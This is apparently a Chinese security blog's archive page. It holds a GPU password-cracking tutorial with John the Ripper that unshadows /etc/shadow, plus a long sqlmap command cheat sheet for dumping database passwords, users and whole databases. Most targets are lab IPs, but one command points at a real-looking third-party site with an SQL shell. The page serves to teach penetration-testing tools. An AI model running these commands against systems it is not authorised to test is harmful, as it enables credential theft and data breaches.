寻觅生命中的那一片浅草......

文章属于类别 Security

GPU并行计算学习

因为好奇,想学点新东西,所以有了一点断断续续的测试,还有本文

GPU有多强

以Nvidia GT 740为例,500块左右,有384个核,而目前台式机,强劲的i7也只有4核8线程啊,所以显卡非常适合做并行计算。

对于服务器级别的,如Nvidia的K或者M系列,核数则可以去到2000-4000,当然价格也比较感人,上万块。

再来看一点亲测的数据,一个6位包含小写字母和数字的Linux密码,用CPU和GPU去破解,他们之间的耗时

# GPU
time ./john --format=sha512crypt-opencl ~/passwordsdb
# CPU
time ./john ~/passwordsdb
处理器 时间(分钟)
GPU 34
CPU 170

应用领域

目前已经有云供应商提供GPU计算服务,我们大概可以把GPU运算应用于

  • 各种Crack
  • 深度学习,如Caffee
  • 挖矿

并行计算标准

  • CUDA,Nivia only,官网提供了Win、Linux、MAC全平台的工具包
  • OpenCL,苹果推出,兼容Nivdia、AMD、Intel,据查资料,部分ARM架构的GPU也支持

Kali

大名鼎鼎的安全发行版,版本是「kali-linux-2016.1-amd64.iso」

安装Nivdia工具

apt-get -y install nvidia-cuda-toolkit libssl-dev 
# 列出显卡
nvidia-smi -L
# 以下为上面的指令输出
GPU 0: GeForce GT 740 (UUID: GPU-8c5c127a-1628-f75e-bde2-61b202fe83b3)

如果安装不成功,也可以参考下面的文档继续折腾下,在线安装比较卡,推荐另外一个源

Install NVIDIA Drivers on Kali

vim /etc/apt/sources.list
#中科大kali源  推荐,快
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free

安装JohnTheRapper

john比较智能,不需要指定密码组成字符集就可以运行,它会先用single-mode,然后是wordlist with rules,最后是incremental mode

Kali自带John,但不支持GPU,所以需要手工安装一个

# 需要用github上的最新版,否则编译报错
cd /dist/src
git clone https://github.com/magnumripper/JohnTheRipper.git
cd JohnTheRapper
# 默认不开启CUDA,需要显式开启,不过意义不大,因为在OpenCL下比CUDA更快
./configure --enable-cuda
make -s -j 5
cd ../run

列出OpenCL设备

# 列出OpenCL设备
./john --list=opencl-devices
Platform #0 name: NVIDIA CUDA, version: OpenCL 1.2 CUDA 7.5.23
    Device #0 (0) name:     GeForce GT 740
    Device vendor:          NVIDIA Corporation
    Device type:            GPU (LE)
    Device version:         OpenCL 1.2 CUDA
    Driver version:         352.79 [recommended]
    Native vector widths:   char 1, short 1, int 1, long 1
    Preferred vector width: char 1, short 1, int 1, long 1
    Global Memory:          1023.10 MB
    Global Memory Cache:    32.0 KB
    Local Memory:           48.0 KB (Local)
    Max memory alloc. size: 255.2 MB
    Max clock (MHz):        1058
    Profiling timer res.:   1000 ns
    Max Work Group Size:    1024
    Parallel compute cores: 2
    CUDA cores:             384  (2 x 192)
    Speed index:            406272
    Warp size:              32
    Max. GPRs/work-group:   65536
    Kernel exec. timeout:   yes
    PCI device topology:    01:00.0

列出CUDA设备

./john --list=cuda-devices
CUDA runtime 7.0, driver 7.5 - 1 CUDA device found:

CUDA Device #0
    Name:                          GeForce GT 740
    Type:                          discrete
    Compute capability:            3.0 (sm_30)
    Number of stream processors:   384 (2 x 192)
    Clock rate:                    1058 Mhz
    Memory clock rate (peak)       2500 Mhz
    Memory bus width               128 bits
    Peak memory bandwidth:         80 GB/s
    Total global memory:           1023.10 MB
    Total shared memory per block: 48.0 KB
    Total constant memory:         64.0 KB
    L2 cache size                  256.2 KB
    Kernel execution timeout:      Yes
    Concurrent copy and execution: One direction
    Concurrent kernels support:    Yes
    Warp size:                     32
    Max. GPRs/thread block         65536
    Max. threads per block         1024
    Max. resident threads per MP   2048
    PCI device topology:           01:00.0

测试破解密码

Linux

不同版本的Linux,所用加密方式不一样,可以用下面的指令查看Linux系统的加密方式

grep ^ENCRYPT_METHOD /etc/login.defs
# 输出
ENCRYPT_METHOD SHA512
# 将用户名和hash后的密码整合下
unshadow /etc/passwd /etc/shadow > ~/passwordsdb
# OpenCL
./john --format=sha512crypt-opencl ~/passwordsdb
# CUDA
./john --format=sha512crypt-cuda ~/passwordsdb
# 再次查看破解后的密码
./john --show ~/passwordsdb

普通MD5

# GPU
time ./john --format=raw-MD5-opencl ~/md5_password.txt
time ./john --format=raw-MD5 ~/md5_password.txt

MAC

去官网找到对应的dmg下载安装即可,有一个CUDA-Z的工具,可以检测到CUDA设备

测试破解

# 密码构成字符集
echo -n 'abcdefghijklmnopqrstuvwxyz0123456789' > charsets/charsetall
# md5后的密码
echo -n 'e99a18c428cb38d5f260853678922e03' > test_hashes/Hashes-MD5.txt
# 开始破解
./Cryptohaze-Multiforcer  -h MD5 -c charsets/charsetall -f test_hashes/Hashes-MD5.txt --min=4 --max=9

其他

Kali上的信息查看工具

glxinfo

如果glxinfo提示direct rendering为yes说明显卡3D加速已经激活

glxinfo |grep -i 'direct rendering'
# 以下为输出内容
direct rendering: Yes

nvidia-settings

可以看到很详细的信息,包括GPU核心数,当前负载

apt-get install nvidia-settings
# 直接运行
nvidia-settings

请看图

参考文档

ZZ:Let’s Encrypt,免费好用的 HTTPS 证书

很早之前我就在关注 Let’s Encrypt 这个免费、自动化、开放的证书签发服务。它由 ISRG(Internet Security Research Group,互联网安全研究小组)提供服务,而 ISRG 是来自于美国加利福尼亚州的一个公益组织。Let’s Encrypt 得到了 Mozilla、Cisco、Akamai、Electronic Frontier Foundation 和 Chrome 等众多大公司的支持,发展十分迅猛。

全文见:Let’s Encrypt,免费好用的 HTTPS 证书

xmlrpc over ssl

最近在看func的源码,深奥,经大师指点,看完代码要自己实现一次,搞了个比较简单的

源码见

https://github.com/johncanlam/sslxmlrpc

zz:SSL工作流程,握手过程

讲得比较详细,清晰
点击:

SSL工作流程,握手过程

sqlmap简单中文说明

mickey整理
来源:影子

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 5 //更详细的信息

load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/post_int.php” –method POST –data “id=1”

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/cookie_int.php” –cookie “id=1” -v 1

使用referer欺骗
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –referer “http://www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1” –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” -v 1 -a “./txt/user-agents.txt”

使用基本认证
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1” –auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1” –auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –proxy “http://192.168.1.47:3128”
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –proxy “http://192.168.1.47:8118”

使用多线程猜解
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” -v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -v 1 -p “id
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -v 2 –dbms “PostgreSQL”

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -v 2 –os “Windows”

* Linux
* Windows

自定义payload
Options: –prefix and –postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET[‘id’] . “‘) LIMIT 0, 1”;:

$ python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1” -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’=’test”

[…]
[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[…]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
[…]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1′) AND 7433=7433 AND (‘test’=’test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=(‘1’) AND 7433=7433 AND (‘test’=’test’) LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” –string “luther” -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” –regexp “<td>lu[\w][\w]er” -v

排除网站的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1” –excl-reg “Dynamic content: ([\d]+)”

多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –stacked-test -v 1

union注入测试
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1” –union-test -v 1

unionz注入配合orderby
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1” –union-test –union-tech orderby -v 1

python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” -v 1 –union-use –banner
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” -v 5 –union-use –current-user
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1” -v 1 –union-use –dbs

fingerprint
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” -v 1 -f
python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b

判断当前用户是否是dba
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –is-dba -v 1

列举数据库用户
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –users -v 0

列举数据库用户密码
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –passwords -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –passwords -U sa -v 0

查看用户权限
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1” –privileges -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –privileges -U postgres -v 0

列数据库
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –dbs -v 0

列出指定数据库指定表的列名
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –dump -T users -D master -C surname -v 0

指定列的范围从2-4
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库,所有表的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –dump-all -v 0

只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1” –dump-all –exclude-sysdbs -v 0

sql query
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” –sql-query “SELECT usename FROM pg_user” -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1” –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3” -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保存和恢复会话
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -b -v 1 -s “sqlmap.log”

保存选项到INC配置文件
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1” -b -v 1 –save

2018年七月
« 2月    
 1
2345678
9101112131415
16171819202122
23242526272829
3031